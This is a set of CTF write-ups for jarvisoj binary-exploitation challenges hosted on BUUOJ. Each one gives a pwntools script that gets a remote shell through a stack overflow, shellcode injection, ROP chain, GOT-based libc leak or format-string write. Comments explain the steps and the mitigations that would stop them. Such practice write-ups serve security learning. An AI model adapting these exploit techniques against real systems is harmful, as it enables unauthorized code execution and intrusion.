0x01 jarvisoj_level0
簡單的地址改寫
from pwn import *
# Connect to the challenge instance on the practice platform (the local
# `process(...)` line below is the offline alternative).
p = remote('node3.buuoj.cn', 26882)
#p = process('./level0')
# Fixed address the saved return address is redirected to (per the heading:
# a plain address overwrite). The value is challenge-specific; taken from the binary.
shell_addr = 0x0000000000400596
# 0x88 filler bytes presumably reach the saved return address, which is then
# replaced with shell_addr. Mitigation note: a stack canary, or PIE randomising
# shell_addr, would defeat a fixed-offset/fixed-address overwrite of this kind.
p.sendline('a'*0x88+p64(shell_addr))
p.interactive()
0x01 jarvisoj_level2
下面的代碼本地可行,但遠程由於數據接收順序有問題,可以用jarvisoj_level3的payload稍作修改使用。
from pwn import *
context.log_level = 'debug'
# Remote challenge instance; the commented `process` line is the local run
# (note it names `level1`, not level2 as in the heading).
p = remote('node3.buuoj.cn', 29661)
#p = process('level1')
# The program itself prints a stack buffer address after "this:"; read the
# 10 characters that follow (e.g. "0xffffd0c0") and parse them as hex.
p.recvuntil('this:')
buf_addr = int(p.recv(10), 16)
print hex(buf_addr)
# Payload: shellcode at the start of the buffer, padded with NULs to 0x8C,
# then the leaked buffer address as the overwritten return address (4 bytes,
# so this is a 32-bit target).
payload = asm(shellcraft.sh())
payload = payload.ljust(0x8C, '\x00')
payload += p32(buf_addr)
# Mitigation note: executing code placed in a stack buffer relies on a
# non-NX stack; NX alone would stop this regardless of the address leak.
p.sendline(payload)
p.interactive()
0x02 jarvisoj_level2
簡單rop,在可執行文件中找到rop
from pwn import *
# Remote challenge instance.
p = remote('node3.buuoj.cn', 26369)
# Both values come from the executable itself (per the heading, the ROP
# pieces are found in the binary): a "/bin/sh" string and system's address.
bin_sh = 0x0804A024
system_addr = 0x08048320
# 32-bit return-to-system layout: 0x8C filler presumably up to the saved
# return address, then system_addr, a dummy return address (0), and the
# single argument (pointer to "/bin/sh").
# Mitigation note: a stack canary would catch the overwrite before the return;
# PIE would randomise both constants used here.
p.sendline('a'*0x8C + p32(system_addr) + p32(0) + p32(bin_sh))
p.interactive()
0x03 jarvisoj_level2_x64
64位的
from pwn import *
context.log_level = 'debug'
# Remote challenge instance; `process` line is the local alternative.
p = remote('node3.buuoj.cn', 27014)
#p = process('./level2_x64')
# Parse the binary to resolve the PLT entry for system.
elf = ELF('./level2_x64')
# `pop rdi; ret` gadget address (constant taken from the binary) — on x86-64
# the first argument is passed in rdi, so a gadget is needed to load it.
pop_rdi = 0x00000000004006B3
system_plt = elf.plt['system']
# Address of a "/bin/sh" string in the binary's data (constant from the binary).
str_sh = 0x0000000000600A90
# Wait for the prompt, then send: 0x88 filler, gadget, its argument, system@plt.
# Mitigation note: PIE would randomise every fixed address here; a canary
# would detect the overwrite before the return.
p.recvuntil('Input:\n')
p.sendline('a'*0x88 + p64(pop_rdi) + p64(str_sh) + p64(system_plt))
p.interactive()
0x04 jarvisoj_level3
泄露libc基址,構造rop
from pwn import *
# LibcSearcher: third-party helper that identifies the remote libc build from
# one leaked symbol address and returns symbol offsets for that build.
from LibcSearcher import *
#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')
# GOT slot of read (holds read's runtime address once resolved) and PLT stub
# of write, both resolved from the binary.
read_got = elf.got['read']
write_plt = elf.plt['write']
# Address of the vulnerable function, used as write's return address so the
# program loops back and accepts a second payload.
vul_addr = 0x0804844B
# Stage 1 (leak): 0x8C filler, then call write(1, read_got, 4) via the PLT
# and return into vul_addr. This prints read's runtime address.
payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)
read_addr = u32(p.recv(4))
# Derive the libc base from the leak and compute system and "/bin/sh" from it.
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
# Stage 2: return-to-system with a dummy return address (0) and "/bin/sh" as
# the argument. Mitigation note: the leak works because the GOT is readable
# and the overflow is repeatable; a stack canary would block both stages.
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)
p.sendlineafter('Input:\n', payload)
p.interactive()
0x05 jarvisoj_level4
和 jarvisoj_level3一樣,只有輸入有些差別。
0x06 jarvisoj_level3_x64
from pwn import *
# LibcSearcher: third-party helper that maps one leaked symbol address to a
# libc build and returns symbol offsets for it.
from LibcSearcher import *
context.log_level = 'debug'
p = remote('node3.buuoj.cn', 26368)
elf = ELF('./level3_x64')
# Vulnerable function address (re-entered after the leak so a second payload
# can be sent) and the two gadgets used to load rdi/rsi (x86-64 passes the
# first two arguments in rdi and rsi). All three constants come from the binary.
vul_addr = 0x00000000004005E6
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
write_got = elf.got['write']
write_plt = elf.plt['write']
# Stage 1 (leak): 0x88 filler, then set rsi = write_got (r15 gets a dummy 0),
# rdi = 1, call write@plt, and return into vul_addr. Prints write's address.
payload = 'a'*0x88 + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(pop_rdi_ret) + p64(1) + p64(write_plt) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)
# Only 6 bytes of a user-space x86-64 address are non-zero; pad to 8 for u64.
write_addr = u64(p.recv(6).ljust(8, '\x00'))
# Derive libc base and the needed symbols from the leak.
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
# Stage 2: rdi = "/bin/sh", call system, then return into vul_addr.
# Mitigation note: a stack canary would stop the overflow in both stages;
# PIE would randomise the gadget and vul_addr constants.
payload = 'a'*0x88 + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)
p.interactive()
0x07 jarvisoj_fm
簡單的格式化字符串,找到棧的偏移量,向x寫入4就行。
from pwn import *
# Remote challenge instance; `process` line is the local alternative.
p = remote('node3.buuoj.cn', 27369)
# p = process('./fm')
elf = ELF('./fm')
# Address of the global `x` (constant from the binary) that the format-string
# write targets; per the heading, writing the value 4 to it is the goal.
x_addr = 0x0804A02C
# Format-string write: the 4-byte address is placed first in the buffer, and
# `%11$n` stores the number of bytes printed so far (4, the address itself)
# into the pointer found at stack argument 11 — the offset the heading says
# was located by inspecting the stack.
# Mitigation note: this is the classic consequence of passing user input as
# the printf format argument; a constant format string ("%s") removes it,
# and -Wformat-security flags the pattern at compile time.
payload = p32(x_addr) + '%11$n'
p.sendline(payload)
p.interactive()